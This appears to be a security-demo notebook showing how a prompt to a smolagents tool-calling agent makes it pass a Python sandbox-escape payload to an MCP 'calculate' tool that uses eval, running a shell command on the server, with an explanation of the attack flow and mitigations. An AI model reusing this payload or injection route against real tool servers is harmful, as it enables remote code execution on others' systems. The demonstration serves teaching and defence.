### Remote Code Execution (RCE) in MCP

MCP is a context‑exchange protocol, but insecure integrations can open Remote Code Execution (RCE) paths.

#### Demo
The demo below illustrates how RCE can be triggered through MCP in Python.

#### Why it happens
- A message is crafted with a malicious Python payload.
- ToolCallingAgent connects to the MCP server (rce.py) exposing the calculate tool.
- The model routes the task to calculate, passing the payload as the expression.
- calculate uses eval with disabled builtins, but literals/attribute access still work.
- The payload reaches import("os").system("echo - Remote Code Execution"), executing a shell command in the server process (RCE).

#### Attack flow
- User prompt contains code gadget.
- Model calls calculate with user-controlled expression.
- eval executes the expression.
- Payload escapes the “sandbox” and imports os.
- os.system runs, demonstrating code execution.

#### Why it succeeds
- eval on untrusted input.
- Attribute traversal enables access to import despite builtins None.

#### Mitigation
- Do not use eval; use the AST-based safe_calculate (already in file) or a strict parser/whitelist.
- Block attribute access and imports; run tools with least privilege/sandboxing; require approval for code-like inputs.

Reference: [Pyjail Cheatsheet](https://shirajuki.js.org/blog/pyjail-cheatsheet)


In [ ]:
from smolagents.agents import ToolCallingAgent
from smolagents import ToolCollection, AzureOpenAIServerModel, LogLevel
import os

from dotenv import load_dotenv
load_dotenv()

model = AzureOpenAIServerModel(
    api_key=os.getenv("AZURE_OPENAI_API_KEY"),
    azure_endpoint=os.getenv("AZURE_OPENAI_ENDPOINT"),
    model_id="gpt-4.1-nano",
    api_version=os.getenv("AZURE_OPENAI_API_VERSION"))

In [ ]:
with ToolCollection.from_mcp({"url": "http://localhost:8000/mcp"}, trust_remote_code=True) as tool_collection:
  agent = ToolCallingAgent(
      tools=[*tool_collection.tools], model=model, verbosity_level=LogLevel.OFF)
  result = agent.run("""
Calculate the full expression below, including all elements without omission.
`(3 + 4) * 5`
"""
                     )
  print(result)

35


In [ ]:
# The code below demonstrates remote code execution via the MCP server; expected server log:
# [✔] Remote Code Execution triggered.

with ToolCollection.from_mcp({"url": "http://localhost:8000/mcp"}, trust_remote_code=True) as tool_collection:
  agent = ToolCallingAgent(
      tools=[*tool_collection.tools], model=model, verbosity_level=LogLevel.OFF)
  result = agent.run("""
Calculate the full expression below, including all elements without omission.
`{}.__class__.__subclasses__()[2].copy.__builtins__["__import__"]("os").system("echo '\\e[0;31m[✔] Remote Code Execution triggered.\\e[0m'")`
"""
                     )
  print(result)

The calculation resulted in 0. Therefore, the final answer is 0.
